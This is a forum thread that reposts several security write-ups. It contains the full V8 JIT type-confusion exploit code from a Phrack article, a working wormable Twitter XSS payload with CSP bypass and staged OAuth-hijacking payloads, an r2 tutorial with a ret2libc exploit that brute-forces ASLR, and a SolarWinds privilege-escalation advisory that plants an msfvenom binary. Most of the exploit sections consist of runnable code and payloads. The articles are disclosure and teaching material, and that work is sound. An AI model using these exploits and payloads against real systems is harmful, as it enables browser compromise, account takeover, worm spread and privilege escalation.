    [17] https://bugs.chromium.org/p/project-zero/issues/detail?id=1396
    [16] https://cloudblogs.microsoft.com/microsoftsecure/2017/10/18/
    browser-security-beyond-sandboxing/
    [18] https://www.mozilla.org/en-US/security/advisories/
    mfsa2018-24/#CVE-2018-12386
    [19] https://mathiasbynens.be/notes/prototypes
    [20] https://github.com/v8/v8/commit/
    14917b6531596d33590edb109ec14f6ca9b95536
    
    
    --[ 6 - Exploit Code
    
    if (typeof(window) !== 'undefined') {
        print = function(msg) {
            console.log(msg);
            document.body.textContent += msg + "\r\n";
        }
    }
    
    {
        // Conversion buffers.
        let floatView = new Float64Array(1);
        let uint64View = new BigUint64Array(floatView.buffer);
        let uint8View = new Uint8Array(floatView.buffer);
    
        // Feature request: unboxed BigInt properties so these aren't needed =)
        Number.prototype.toBigInt = function toBigInt() {
            floatView[0] = this;
            return uint64View[0];
        };
    
        BigInt.prototype.toNumber = function toNumber() {
            uint64View[0] = this;
            return floatView[0];
        };
    }
    
    // Garbage collection is required to move objects to a stable position in
    // memory (OldSpace) before leaking their addresses.
    function gc() {
        for (let i = 0; i < 100; i++) {
            new ArrayBuffer(0x100000);
        }
    }
    
    const NUM_PROPERTIES = 32;
    const MAX_ITERATIONS = 100000;
    
    function checkVuln() {
        function hax(o) {
            // Force a CheckMaps node before the property access. This must
            // load an inline property here so the out-of-line properties
            // pointer cannot be reused later.
            o.inline;
    
            // Turbofan assumes that the JSCreateObject operation is
            // side-effect free (it has the kNoWrite property). However, if the
            // prototype object (o in this case) is not a constant, then
            // JSCreateObject will be lowered to a runtime call to
            // CreateObjectWithoutProperties. This in turn eventually calls
            // JSObject::OptimizeAsPrototype which will modify the prototype
            // object and assign it a new Map. In particular, it will
            // transition the OOL property storage to dictionary mode.
            Object.create(o);
    
            // The CheckMaps node for this property access will be incorrectly
            // removed. The JIT code is now accessing a NameDictionary but
            // believes its loading from a FixedArray.
            return o.outOfLine;
        }
    
        for (let i = 0; i < MAX_ITERATIONS; i++) {
            let o = {inline: 0x1337};
            o.outOfLine = 0x1338;
            let r = hax(o);
            if (r !== 0x1338) {
                return;
            }
        }
    
        throw "Not vulnerable"
    };
    
    // Make an object with one inline and numerous out-of-line properties.
    function makeObj(propertyValues) {
        let o = {inline: 0x1337};
        for (let i = 0; i < NUM_PROPERTIES; i++) {
            Object.defineProperty(o, 'p' + i, {
                writable: true,
                value: propertyValues[i]
            });
        }
        return o;
    }
    
    //
    // The 3 exploit primitives.
    //
    
    // Find a pair (p1, p2) of properties such that p1 is stored at the same
    // offset in the FixedArray as p2 is in the NameDictionary.
    let p1, p2;
    function findOverlappingProperties() {
        let propertyNames = [];
        for (let i = 0; i < NUM_PROPERTIES; i++) {
            propertyNames[i] = 'p' + i;
        }
        eval(`
            function hax(o) {
                o.inline;
                this.Object.create(o);
                ${propertyNames.map((p) => `let ${p} = o.${p};`).join('\n')}
                return [${propertyNames.join(', ')}];
            }
        `);
    
        let propertyValues = [];
        for (let i = 1; i < NUM_PROPERTIES; i++) {
            // There are some unrelated, small-valued SMIs in the dictionary.
            // However they are all positive, so use negative SMIs. Don't use
            // -0 though, that would be represented as a double...
            propertyValues[i] = -i;
        }
    
        for (let i = 0; i < MAX_ITERATIONS; i++) {
            let r = hax(makeObj(propertyValues));
            for (let i = 1; i < r.length; i++) {
                // Properties that overlap with themselves cannot be used.
                if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) {
                    [p1, p2] = [i, -r[i]];
                    return;
                }
            }
        }
    
        throw "Failed to find overlapping properties";
    }
    
    // Return the address of the given object as BigInt.
    function addrof(obj) {
        // Confuse an object with an unboxed double property with an object
        // with a pointer property.
        eval(`
            function hax(o) {
                o.inline;
                this.Object.create(o);
                return o.p${p1}.x1;
            }
        `);
    
        let propertyValues = [];
        // Property p1 should have the same Map as the one used in
        // corrupt for simplicity.
        propertyValues[p1] = {x1: 13.37, x2: 13.38};
        propertyValues[p2] = {y1: obj};
    
        for (let i = 0; i < MAX_ITERATIONS; i++) {
            let res = hax(makeObj(propertyValues));
            if (res !== 13.37) {
                // Adjust for the LSB being set due to pointer tagging.
                return res.toBigInt() - 1n;
            }
        }
    
        throw "Addrof failed";
    }
    
    // Corrupt the backingStore pointer of an ArrayBuffer object and return the
    // original address so the ArrayBuffer can later be repaired.
    function corrupt(victim, newValue) {
        eval(`
            function hax(o) {
                o.inline;
                this.Object.create(o);
                let orig = o.p${p1}.x2;
                o.p${p1}.x2 = ${newValue.toNumber()};
                return orig;
            }
        `);
    
        let propertyValues = [];
        // x2 overlaps with the backingStore pointer of the ArrayBuffer.
        let o = {x1: 13.37, x2: 13.38};
        propertyValues[p1] = o;
        propertyValues[p2] = victim;
    
        for (let i = 0; i < MAX_ITERATIONS; i++) {
            o.x2 = 13.38;
            let r = hax(makeObj(propertyValues));
            if (r !== 13.38) {
                return r.toBigInt();
            }
        }
    
        throw "CorruptArrayBuffer failed";
    }
    
    function pwn() {
        //
        // Step 0: verify that the engine is vulnerable.
        //
        checkVuln();
        print("[+] v8 version is vulnerable");
    
        //
        // Step 1. determine a pair of overlapping properties.
        //
        findOverlappingProperties();
        print(`[+] Properties p${p1} and p${p2} overlap`);
    
        //
        // Step 2. leak the address of an ArrayBuffer.
        //
        let memViewBuf = new ArrayBuffer(1024);
        let driverBuf = new ArrayBuffer(1024);
    
        // Move ArrayBuffer into old space before leaking its address.
        gc();
    
        let memViewBufAddr = addrof(memViewBuf);
        print(`[+] ArrayBuffer @ 0x${memViewBufAddr.toString(16)}`);
    
        //
        // Step 3. corrupt the backingStore pointer of another ArrayBuffer to
        // point to the first ArrayBuffer.
        //
        let origDriverBackingStorage = corrupt(driverBuf, memViewBufAddr);
    
        let driver = new BigUint64Array(driverBuf);
        let origMemViewBackingStorage = driver[4];
    
        //
        // Step 4. construct the memory read/write primitives.
        //
        let memory = {
            write(addr, bytes) {
                driver[4] = addr;
                let memview = new Uint8Array(memViewBuf);
                memview.set(bytes);
            },
            read(addr, len) {
                driver[4] = addr;
                let memview = new Uint8Array(memViewBuf);
                return memview.subarray(0, len);
            },
            read64(addr) {
                driver[4] = addr;
                let memview = new BigUint64Array(memViewBuf);
                return memview[0];
            },
            write64(addr, ptr) {
                driver[4] = addr;
                let memview = new BigUint64Array(memViewBuf);
                memview[0] = ptr;
            },
            addrof(obj) {
                memViewBuf.leakMe = obj;
                let props = this.read64(memViewBufAddr + 8n);
                return this.read64(props + 15n) - 1n;
            },
            fixup() {
                let driverBufAddr = this.addrof(driverBuf);
                this.write64(driverBufAddr + 32n, origDriverBackingStorage);
                this.write64(memViewBufAddr + 32n, origMemViewBackingStorage);
            },
        };
    
        print("[+] Constructed memory read/write primitive");
    
        // Read from and write to arbitrary addresses now :)
        memory.write64(0x41414141n, 0x42424242n);
    
        // All done here, repair the corrupted objects.
        memory.fixup();
    
        // Verify everything is stable.
        gc();
    }
    
    if (typeof(window) === 'undefined')
        pwn();
    
    --[ EOF
    

     

    Sursa: http://phrack.org/papers/jit_exploitation.html

  4. Tale of a Wormable Twitter XSS

    TwitterWorm.png TwitterXSSWorm

    In mid-2018, I found a stored XSS on Twitter in the least likely place you could think of. Yes, right in the tweet! But what makes this XSS so special is that it had the potential to be turned into a fully-fledged XSS worm. If the concept of XSS worms is new to you, you might want to read more about it on Wikipedia.

    Let me jump right to the full exploit and then we can explain the magic later on. Before this got fixed, tweeting the following URL would have created an XSS worm that spreads from account to account throughout the Twitterverse:

    https://twitter.com/messages/compose?recipient_id=988260476659404801&welcome_message_id=988274596427304964&text=%3C%3Cx%3E/script%3E%3C%3Cx%3Eiframe%20id%3D__twttr%20src%3D/intent/retweet%3Ftweet_id%3D1114986988128624640%3E%3C%3Cx%3E/iframe%3E%3C%3Cx%3Escript%20src%3D//syndication.twimg.com/timeline/profile%3Fcallback%3D__twttr/alert%3Buser_id%3D12%3E%3C%3Cx%3E/script%3E%3C%3Cx%3Escript%20src%3D//syndication.twimg.com/timeline/profile%3Fcallback%3D__twttr/frames%5B0%5D.retweet_btn_form.submit%3Buser_id%3D12%3E

    “How so? It’s just a link!”, you might wonder. But this, my friend, is no ordinary link. It’s a Welcome Message deeplink [1]. The deeplink gets rendered as a Twitter card:

     

    twcard.png

     

    This Twitter card is actually an iframe element which points to “https://twitter.com/i/cards/tfw/v1/1114991578353930240”. The iframe is obviously same-origin and not sandboxed (which means we have DOM access to the parent webpage). The payload in the “text” parameter would then get reflected back in an inline JSON object as the value of the “default_composer_text” key:

    <script type="text/twitter-cards-serialization">
      {
        "strings": { },
        "card": {
      "viewer_id" : "988260476659404801",
      "is_caps_enabled" : true,
      "forward" : "false",
      "is_logged_in" : true,
      "is_author" : true,
      "language" : "en",
      "card_name" : "2586390716:message_me",
      "welcome_message_id" : "988274596427304964",
      "token" : "[redacted]",
      "is_emojify_enabled" : true,
      "scribe_context" : "%7B%7D",
      "is_static_view" : false,
      "default_composer_text" : "</script><iframe id=__twttr src=/intent/retweet?tweet_id=1114986988128624640></iframe><script src=//syndication.twimg.com/timeline/profile?callback=__twttr/alert;user_id=12></script><script src=//syndication.twimg.com/timeline/profile?callback=__twttr/frames[0].retweet_btn_form.submit;user_id=12>\\u00A0",
      "recipient_id" : "988260476659404801",
      "card_uri" : "https://t.co/1vVzoyquhh",
      "render_card" : true,
      "tweet_id" : "1114991578353930240",
      "card_url" : "https://t.co/1vVzoyquhh"
    },
        "twitter_cldr": false,
        "scribeData": {
          "card_name": "2586390716:message_me",
          "card_url": "https://t.co/1vVzoyquhh"
          
          
          
        }
      }
    </script>
    

    Note: Once the HTML parser encounters a closing script tag `</script>` anywhere after the initial opening tag `<script>`, it gets immediately terminated even when the encountered `</script>` tag is inside a string literal, a comment, or a regex….

    But before you could get to this point, you’d have had to overcome many limitations and obstacles first:

    • Both single and double quotes get escaped to `\’` and `\”`, respectively.
    • HTML tags get stripped (so `a</script>b` would become `ab`).
    • The payload gets truncated at around 300 characters.
    • There is a CSP policy in place which disallows non-whitelisted inline scripts.

    At first glance, these might look like proper countermeasures. But the moment I noticed the HTML-tag stripping behavior, my spidey sense started tingling. That’s because this is usually error-prone. Unlike escaping individual characters, stripping tags requires HTML parsing (and parsing is always hard to get right, regexes anybody?).

    So I started fiddling with a very basic payload `</script><svg onload=alert()>` and kept fiddling until I ended up with `<</<x>/script/test000><</<x>svg onload=alert()></><script>1<\x>2` which got turned into `</script/test000><svg onload=alert()>`. Jackpot, I immediately reported my finding to the Twitter security team at this point and didn’t wait until I found a bypass for the CSP policy.

    Now, let’s take a closer look at Twitter’s CSP policy:

    script-src 'nonce-ETj41imzIQ/aBrjFcbynCg==' https://twitter.com https://*.twimg.com https://ton.twitter.com 'self'; frame-ancestors https://ms2.twitter.com https://twitter.com http://localhost:8889 https://momentmaker-local.twitter.com https://localhost.twitter.com https://tdapi-staging.smf1.twitter.com https://ms5.twitter.com https://momentmaker.twitter.com https://tweetdeck.localhost.twitter.com https://ms3.twitter.com https://tweetdeck.twitter.com https://wfa.twitter.com https://mobile.twitter.com https://ms1.twitter.com 'self' https://ms4.twitter.com; font-src https://twitter.com https://*.twimg.com data: https://ton.twitter.com 'self'; media-src https://twitter.com https://*.twimg.com https://ton.twitter.com blob: 'self'; connect-src https://caps.twitter.com https://cards.twitter.com https://cards-staging.twitter.com https://upload.twitter.com blob: 'self'; style-src https://twitter.com https://*.twimg.com https://ton.twitter.com 'unsafe-inline' 'self'; object-src 'none'; default-src 'self'; frame-src https://twitter.com https://*.twimg.com https://* https://ton.twitter.com 'self'; img-src https://twitter.com https://*.twimg.com data: https://ton.twitter.com blob: 'self'; report-uri https://twitter.com/i/csp_report?a=NVQWGYLXMNQXEZDT&ro=false;

    An interesting fact is, Twitter doesn’t deploy one global CSP policy throughout the entire app. Instead, different parts of the app have different CSP policies. This is the CSP policy for Twitter cards, and we are only interested in the `script-src` directive for now.

    To the trained eye, the wildcard origin “https://*.twimg.com” looks too permissive and is most likely to be the vulnerable point. So it wasn’t very hard to find a JSONP endpoint on a subdomain of “twimg.com”: https://syndication.twimg.com/timeline/profile?callback=__twttr;user_id=12

    The hard part was, bypassing the callback validation. You can’t simply just specify any callback you like, it must start with the `__twttr` prefix (otherwise, the callback is rejected). This means you can’t pass built-in functions like `alert` for instance (but you could use `__twttralert`, which of course evaluates to `undefined`). I then did a few checks to see which characters are filtered for the callback and which are allowed, and oddly enough, forward slashes were allowed in the “callback” parameter (i.e., “?callback=__twttr/alert”). This would then result in the following response:

    /**/__twttr/alert({"headers":{"status":200,"maxPosition":"1113300837160222720","minPosition":"1098761257606307840","xPolling":30,"time":1554668056},"body":"[...]"});

    So now we just need to figure out a way to define a `__twttr` reference on the `window` object so we don’t get a `ReferenceError` exception. There are two ways I could think of to do just that:

    1. Find a whitelisted script that defines a `__twttr` variable and include it in the payload.

    2. Set the ID attribute of an HTML element to `__twttr` (which would create a global reference to that element on the `window` object [2]).

    So I went with option #2, and that’s why the iframe element in the payload has an ID attribute despite the fact that we want the payload to be as short as possible.

    So far, so good. But since we can’t inject arbitrary characters in the callback parameter, this means we are quite limited in what JavaScript syntax we can use (note: the semicolon in “?callback=__twttr/alert;user_id=12” is not part of the callback parameter, it’s actually a URL query separator—the same as “&”). But this is not really much of a problem, as we still can invoke any function we want (similar to a SOME attack [3]).

    To sum up what the full payload does:

    1. Create an iframe element with the ID “__twttr” which points to a specific tweet using Twitter Web Intents (https://twitter.com/intent/retweet?tweet_id=1114986988128624640).
    2. Use the CSP policy bypass to invoke a synchronous function (i.e., `alert`) to delay the execution of the next script block until the iframe has fully loaded (the alert is not for show—because of syntax limitations, we cannot simply use `setTimeout(func)`).
    3. Use the CSP bypass again to submit a form inside the iframe which causes a specific tweet to get retweeted.

    An XSS worm would ideally spread by retweeting itself. And if there were no syntax limitations, we could have so easily done that. But now that we have to depend on Twitter Web Intents for retweets, we need to know the exact tweet ID and specify that in the payload before actually tweeting it. Quite the dilemma, as tweet IDs are not actually sequential [4] (meaning it won’t be easy to predict the tweet ID beforehand). Oh no, our evil plan is doomed again!

    Well, not really. There are two other relatively easier ways in which we can make the XSS worm spread:

    1. Weaponize a chain of tweets where each tweet in the chain contains a payload that retweets the one preceding it. This way, if you get in contact with any of those tweets, this would initiate a series of retweets which would eventually deliver the first tweet in the chain to every active Twitter account.

    2. Simply promote the tweet that carries the XSS payload so it would have much greater reach.

    Or you could use a mix of those two spreading mechanisms for better results. The possibilities are endless. Also luckily for us, when the “https://twitter.com/intent/retweet?tweet_id=1114986988128624640” page is loaded for an already-retweeted tweet, the `frames[0].retweet_btn_form.submit` method in the payload would then correspond to a follow action instead of a retweet upon invocation.

    This means that the first time a weaponized tweet is loaded on your timeline, it’ll immediately get retweeted on your Twitter profile. But the next time you view this tweet again, it will make you follow the attacker’s account!

    Taking exploitation a step further:

    Making an XSS worm sure can be fun and amusing, but is that really as far as this can go? In case it wasn’t scary enough for you, this XSS could have also been exploited to force Twitter users into authorizing a malicious third-party app to access their accounts silently and with full permissions via the Twitter “oauth/authorize” API [5].

    This could be achieved by loading “https://twitter.com/oauth/authorize?oauth_token=[token]” in an iframe and then automatically submitting the authorization form included within that page (i.e., the form with the ID `oauth_form`). A silent exploit with staged payloads would go as following:

    1. Post a tweet with the following as a payload and obtain its ID:

    </script><iframe src=/oauth/authorize?oauth_token=cXDzjwAAAAAA4_EbAAABaizuCOk></iframe>

    2. Post another tweet with the following as a payload and obtain its ID:

    </script><script id=__twttr src=//syndication.twimg.com/tweets.json?callback=__twttr/parent.frames[0].oauth_form.submit;ids=20></script>

    3. Post a third tweet with the following as a payload (which combines the two tweets together in one page):

    </script><iframe src=/i/cards/tfw/v1/1118608452136460288></iframe><iframe src=/i/cards/tfw/v1/1118609496560029696></iframe>

    Now as soon as the third tweet gets loaded on a user’s timeline, a malicious third-party app would have full access to their account. The only caveat here is that the “oauth_token” value is valid for one use only and has a relatively short expiry time. But this is not much of a problem either as an attacker could post as many tweets as needed to compromise any number of accounts.

    The bottom line is, I could have forced you to load any page on Twitter, click any button, submit any form, and what not!

    P.S. If you want to get in touch, you can find me on Twitter/GitHub. Also don’t forget to follow our official Twitter account!

    Disclosure Timeline:

    • 23rd April 2018 – I filed the initial bug report.
    • 25th April 2018 – The report got triaged.
    • 27th April 2018 – Twitter awarded a $2,940 bounty.
    • 4th May 2018 – A fix was rolled out.
    • 7th April 2019 – I provided more information on the CSP bypass.
    • 12th April 2019 – I sent a draft of this write-up directly to a Twitter engineer for comment.
    • 12th April 2019 – I was asked to delay publication until after the CSP bypass is fixed.
    • 22nd April 2019 – The CSP bypass got fixed and we got permission to publish.
    • 2nd May 2019 – The write-up was published publicly.

     

    References:

    [1] https://developer.twitter.com/en/docs/direct-messages/welcome-messages/guides/deeplinking-to-welcome-message.html

    [2] https://html.spec.whatwg.org/#named-access-on-the-window-object

    [3] http://www.benhayak.com/2015/06/same-origin-method-execution-some.html

    [4] https://developer.twitter.com/en/docs/basics/twitter-ids.html

    [5] https://developer.twitter.com/en/docs/basics/authentication/api-reference/authorize.html

     
  5. Main Conference - Day 1

     

     

    Sursa: https://troopers.de/troopers19/agenda/#agenda-day--2019-03-20

  6.  

    This post covers basic basics of bypassing ASLR and DEP with r2. For this, a vulnerable application, yolo.c, is required:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    
    void lol(char *b)
    {
        char buffer[1337];
        strcpy(buffer, b);
    }
    
    int main(int argc, char **argv)
    {
        lol(argv[1]);
    }
    

    64-Bit vs 32-Bit Binaries

    The issue here should be quite obvious - strcpy blindly copies the user-controlled input buffer b into buffer which causes a buffer overflow. Since normally ASLR and DEP are enabled, the following things don’t just work out of the box:

    • Providing shellcode via user input: DEP prevents executing this code and the application would just crash
    • Using a library like libc and spawning a shell (e.g. using ret2libc) because the start address of the library is randomized after each start of a process:
    $ gcc yolo.c -o yolo_x64
    
    $ ldd yolo_x64 | grep libc
            libc.so.6 => /usr/lib/libc.so.6 (0x00007fe0def68000)
    
    $ ldd yolo_x64 | grep libc
            libc.so.6 => /usr/lib/libc.so.6 (0x00007fba1f038000) <-- much random
    
    $ ldd yolo_x64 | grep libc
            libc.so.6 => /usr/lib/libc.so.6 (0x00007f3d65b03000) <-- also here
    
    $ ldd yolo_x64 | grep libc
            libc.so.6 => /usr/lib/libc.so.6 (0x00007f584e180000) <-- here too
    
    $ ldd yolo_x64 | grep libc
            libc.so.6 => /usr/lib/libc.so.6 (0x00007fc4aee7c000) <-- :/
    

    As seen above, the start address of libc always has a random value. The ret2libc technique would theoretically work in case an attacker is able to guess the start address of libc. However, for 64-bit binaries the chance to guess this right is just too small. Because of this, this post covers 32-bit binaries where the chance to make a right guess is better:

    $ gcc -fno-stack-protector -m32 yolo.c -o yolo
    
    $ ldd yolo | grep libc
            libc.so.6 => /usr/lib32/libc.so.6 (0xf7cbb000)
    
    $ ldd yolo | grep libc
            libc.so.6 => /usr/lib32/libc.so.6 (0xf7d43000) <-- not so random
    
    $ ldd yolo | grep libc
            libc.so.6 => /usr/lib32/libc.so.6 (0xf7d18000)
    
    $ ldd yolo | grep libc
            libc.so.6 => /usr/lib32/libc.so.6 (0xf7d7d000)
    
    $ ldd yolo | grep libc
            libc.so.6 => /usr/lib32/libc.so.6 (0xf7cb0000)
    

    The approach to guess the right start address is also called brute forcing ASLR. As indicated above, the address space for possible start addresses of the library is not that large anymore for a 32-bit binary:

    $ ldd yolo | grep libc
            libc.so.6 => /usr/lib32/libc.so.6 (0xf7d8d000)
    
    
    $ while true; do echo -ne "."; ldd yolo | grep libc | grep 0xf7d8d000; done
    
    ...................................     libc.so.6 => /usr/lib32/libc.so.6 (0xf7d8d000)
    ..................................................................................................................................................................................................................................................................................................................................................     libc.so.6 => /usr/lib32/libc.so.6 (0xf7d8d000)
    ............................................................................................................... libc.so.6 => /usr/lib32/libc.so.6 (0xf7d8d000)
    

    The same libc start address was found after multiple re-executions. Therefore the value can be guessed by re-using a previously valid start address.

    Please note that for this exercise, stack cookies are disabled while compiling the code (-fno-stack-protector😞

    $ r2 yolo
     -- Finnished a beer
    [0x00001050]> i
    file     yolo
    size     0x3c80
    format   elf
    arch     x86
    bits     32
    canary   false <-- no cookies for you
    nx       true
    os       linux
    pic      true
    relocs   true
    relro    partial
    

    Getting EIP Control

    The first step to exploit this application is to get control over the EIP register. To determine the offset after which the EIP overwrite happens, a buffer with a pattern is being sent to the application using a Python script. The first version of this script just sends a large buffer to check whether the application really crashes:

    #!/usr/bin/python2.7
    
    print "A" * 2000
    

    Now let’s debug the application with r2:

    $ r2 -d yolo
    [0xf7f3e0b0]> ood `!python2.7 b.py`
    [...]
    [0xf7ef40b0]> dc
    child stopped with signal 11
    [+] SIGNAL 11 errno=0 addr=0x41414141 code=1 ret=0
    [0x41414141]> dr
    eax = 0xff8a0317
    ebx = 0x41414141
    ecx = 0xff8a3000
    edx = 0xff8a0add
    esi = 0xf7ea7e24
    edi = 0xf7ea7e24
    esp = 0xff8a0860
    ebp = 0x41414141
    eip = 0x41414141
    eflags = 0x00010282
    oeax = 0xffffffff
    

    The input caused the application to successfully overwrite its EIP register with “AAAA” (41414141). Now repeat this step with a cyclic pattern to determine the correct offset for EIP control. For this, use ragg2 -P 2000 to create the pattern and modify the Python script to print the pattern:

    $ r2 -d yolo
    [0xf7f960b0]> ood `!python2.7 b.py`
    [...]
    [0xf7ef00b0]> dc
    child stopped with signal 11
    [+] SIGNAL 11 errno=0 addr=0x48415848 code=1 ret=0
    [0x48415848]> wopO `dr eip`
    1349
    

    Therefore the EIP register gets overwritten after 1349 bytes.

    ret2libc

    To successfully leverage a return2libc exploit, the following things are required:

    • Start address of libc: This will be brute-forced
    • The offset of the string /bin/sh in the specific libc version in use
    • The offset of the system() call
    • (The offset of exit() to prevent the application from crashing after the shell has exited)

    The idea is to cause the application to use gadgets already present in its memory space to spawn a shell. Because no gadgets of the user input are in use, DEP won’t kick in. If everything works as expected, the application will call system(/bin/sh) upon successful exploitation. The layout of the input buffer is as follows:

    <Junk Byte> * 1349 (Offset)
    <Address of system()> (new EIP)
    <Address of exit()> (new return address)
    <Address of /bin/sh string> (Argument for system())
    

    The layout of this buffer ultimately causes a fake stack frame to be created in the memory of the application. After returning from the call to lol, the program will execute system() with /bin/sh as parameter and exit() as return address. Remember, on x86 arguments are pushed onto the stack in reverse order before calling a function.

    Determining Offsets

    The addresses and offsets mentioned above can be determined using r2 from a running debug session:

    r2 -d yolo
    [0xf7f040b0]> dcu main
    Continue until 0x5660a1be using 1 bpsize
    hit breakpoint at: 5660a1be
    
    [0x5660a1be]> dmi
    0xf7cdf000 0xf7cf8000  /usr/lib32/libc-2.28.so <-- start address of libc of this run
    
    [0x5660a1be]> dmi libc system
    1524 0x0003e8f0 0xf7d1d8f0   WEAK   FUNC   55 system <-- offset of system()
    
    [0x5660a1be]> dmi libc exit
    150 0x000318e0 0xf7d108e0 GLOBAL   FUNC   33 exit <-- offset of exit()
    
    [0x5660a1be]> e search.in=dbg.maps <-- search in more segments
    [0x5660a1be]> / /bin/sh <-- search for /bin/sh string
    Searching 7 bytes in [0xffdb7000-0xffdd8000]
    hits: 0
    0xf7e5eaaa hit0_0 .b/strtod_l.c-c/bin/shexit 0canonica. <-- /bin/sh found
    

    Therefore the values for the exploit to use are:

    • libc start address: 0xf7cdf000 (we just hope this values occurs again)
    • system() offset: 0x0003e8f0
    • exit() offset: 0x000318e0
    • /bin/sh offset: 0x17FAAA (0xf7e5eaaa - 0xf7cdf000)

    In case the correct libc start address is guessed, all other values should then automatically fit too.

    For debugging purposes: Always print the calculated addresses since bad characters like 0x00 or 0x0A in address values may corrupt the input buffer and prevent exploitation.

    Putting the Exploit together

    The developed exploit looks as follows:

    #!/usr/bin/python2.7
    
    import struct
    import sys
    
    EIP_OFFSET = 1349
    
    libc_start = 0xf7cdf000
    binsh_offset = 0x0017FAAA
    system_offset = 0x0003e8f0
    exit_offset = 0x000318e0
    
    system_addr = libc_start + system_offset
    exit_addr = libc_start + exit_offset
    binsh_addr = libc_start + binsh_offset
    
    PAYLOAD = ""
    
    while len(PAYLOAD) < EIP_OFFSET:
        PAYLOAD += "\x90" # NOP
    
    PAYLOAD += struct.pack("<I",system_addr)
    PAYLOAD += struct.pack("<I",exit_addr)
    PAYLOAD += struct.pack("<I",binsh_addr)
    
    sys.stdout.write(PAYLOAD)
    

    To test it without ASLR in place and therefore without the need to brute force the libc start address, temporarily disable ASLR on the system using a root shell:

    # echo 0 > /proc/sys/kernel/randomize_va_space
    

    This causes the start address to remain static and the first exploitation attempt should always succeed:

    [0x565561be]> dmi
    0xf7db0000 0xf7dc9000  /usr/lib32/libc-2.28.so <-- libc start address after disabling ASLR
    [0xf7fd50b0]> ood `!python2.7 exploit.py` <-- running the exploit with static address above
    [0xf7fd50b0]> dc
    sh-5.0$ <-- :)
    

    Now that this worked, enable ASLR again:

    # echo 2 > /proc/sys/kernel/randomize_va_space
    

    And run the exploit in an infinite loop until a shell gets spawned:

    $ while true; do echo -ne "."; ./yolo $(python2.7 exploit.py); done
    ..........................................................................................................yolo: vfprintf.c:4157552864: l: Assertion `(size_t) done <= (size_t) INT_MAX' failed.
    .........................................
    sh-5.0$
    

    ASLR and DEP have been successfully bypassed. The V! view of r2 shows the addresses after being pushed on the stack:

    V!

    Ok Bye.

     

    Sursa: https://ps1337.github.io/post/binary-aslr-dep-32/

  7.  
    While conducting research on insecure Windows Communication Foundation (WCF) endpoints we stumbled upon SolarWinds fleet of products for two reasons; first, they have handful of software that you can test and secondly, most of the services were built using .NET Framework which makes it a strong candidate for our research.
     
    During the testing process, we usually look for the low-hanging fruit variety of bugs. This includes, amongst other things, dynamic analysis of the target program folder if any under “C:\ProgramData” directory and that is how we found a rather trivial elevation of privileges vulnerability in SolarWinds Orion Platform that affected a total of 14 products.
     
    The following is the process used to find and exploit the security vulnerability using SolarWinds Network Configuration Manager v7.8 on Windows Server 2012 R2 Standard instance. First off, we set the following self-explanatory filters in Procmon64.exe
    Picture
     
    Running it will reveal that the process cmd.exe is trying to run handle.exe binary as “NT AUTHORITY\SYSTEM” under “C:\ProgramData\SolarWinds\Orion\RabbitMQ\” directory every 5 seconds!
    Picture
     
    We can see the full command that was used in the command line section under event properties. Now if you haven’t used or heard of handle.exe before, its a Windows Sysinternals utility that displays information about open handles for any given process on the system:
    Picture
     
    Examining the properties of Parent PID 4272 under procexp64.exe clearly shows the logic behind this abnormal behavior:
    Picture
     
    Both the erl.exe process command line arguments and current directory path are enforcing “C:\ProgramData\SolarWinds\Orion\RabbitMQ\” as the current working directory. Before diving in too far, let’s talk more about RabbitMQ which is according to its official website here:
     
    With more than 35,000 production deployments of RabbitMQ world-wide at small startups and large enterprises, RabbitMQ is the most popular open source message broker.
     
    RabbitMQ is lightweight and easy to deploy on premises and in the cloud. It supports multiple messaging protocols. RabbitMQ can be deployed in distributed and federated configurations to meet high-scale, high-availability requirements.
     
    RabbitMQ runs on many operating systems and cloud environments, and provides a wide range of developer tools for most popular languages.
     
    Reading through a few RabbitMQ installation guides for Windows we’ve noticed that for some reason ERLANG is a must have in order for RabbitMQ to function. In Addition, handle.exe is used by RabbitMQ to monitor the local file system and update “File descriptors” field under RabbitMQ web dashboard. All we need at this point is to confirm that we can create/write files as low privileged user via AccessEnum.exe which is the default DACL for the Users group on “C:\ProgramData” and its sub-folders due to inheritance:
    Picture
     
    We used msfvenom from Metasploit toolset to create calc.exe payload:
    Picture
     
    We logged in as standard user and then copied handle.exe to the problematic folder while running procexp64.exe in the background which will effectively pop a calc every 5 seconds as “NT AUTHORITY\SYSTEM”
    Picture
     
    We’ve also recorded a demonstration video for SolarWinds Patch Manager v2.1 on Windows Server 2016 Standard install for your convenience:
     
     
    It's worth mentioning that unlike the other affected products, Access Rights Manager 8MAN v9.1.181.0 uses the vulnerable path “C:\ProgramData\rabbitmq\” instead. Also, we were quite impressed by the exceptional response time and professionalism delivered by SolarWinds PSIRT team. A link to the knowledgebase article regarding this vulnerability can be found here.
    Picture
     
    While wrapping up this blog post we had an interesting thought; how many applications out there utilize RabbitMQ? And what are the chances of those applications experiencing the same issue? We will leave this as an exercise for the reader. Lastly, feel free to reach out to at labs@activecyber.us if you have any questions. See the link here for complete list of ACTIVELabs advisories.
     
    Affected Products
    • SolarWinds IP Address Manager v4.7.0
    • SolarWinds Log Manager for Orion v1.1.0
    • SolarWinds Network Configuration Manager v7.8
    • SolarWinds Orion Network Performance Monitor v12.3
    • SolarWinds Orion Network Traffic Analyzer v4.4
    • SolarWinds Server & Application Monitor v6.7
    • SolarWinds Server Configuration Monitor v1.0
    • SolarWinds Storage Resource Monitor v6.7
    • SolarWinds User Device Tracker v3.3.1
    • SolarWinds Virtualization Manager v8.3
    • SolarWinds VoIP and Network Quality Manager v4.5
    • SolarWinds Web Performance Monitor v2.2.2
    • SolarWinds Patch Manager v2.1
    • Access Rights Manager 8MAN v9.1.181.0
     
     
    Disclosure Timeline
    • 02-19-19: ACTIVELabs sent security vulnerability report to SolarWinds PSIRT team
    • 02-20-19: PSIRT team acknowledged report and stated that they will investigate the issue
    • 02-27-19: PSIRT team communicated that the security vulnerability has been addressed
    • 02-27-19: ACTIVELabs requested more information
    • 02-28-19: PSIRT team confirmed that a patch has been included/released in HotFix 2 version
    • 03-01-19: ACTIVELabs requested CVE from MITRE
    • 03-01-19: CVE-2019-9546 assigned
    • 03-01-19: ACTIVELabs notified PSIRT team about CVE assignment and a blog post will be published in the near future
    • 03-04-19: PSIRT team requested to delay blog post release until proper knowledge base article can be prepared/published
    • 03-04-19: Notified PSIRT team that we will hold off on the blog post until further notice
    • 03-06-19: PSIRT team informed us that a knowledge base article has been released
    • 05-03-19: Blog post released

     

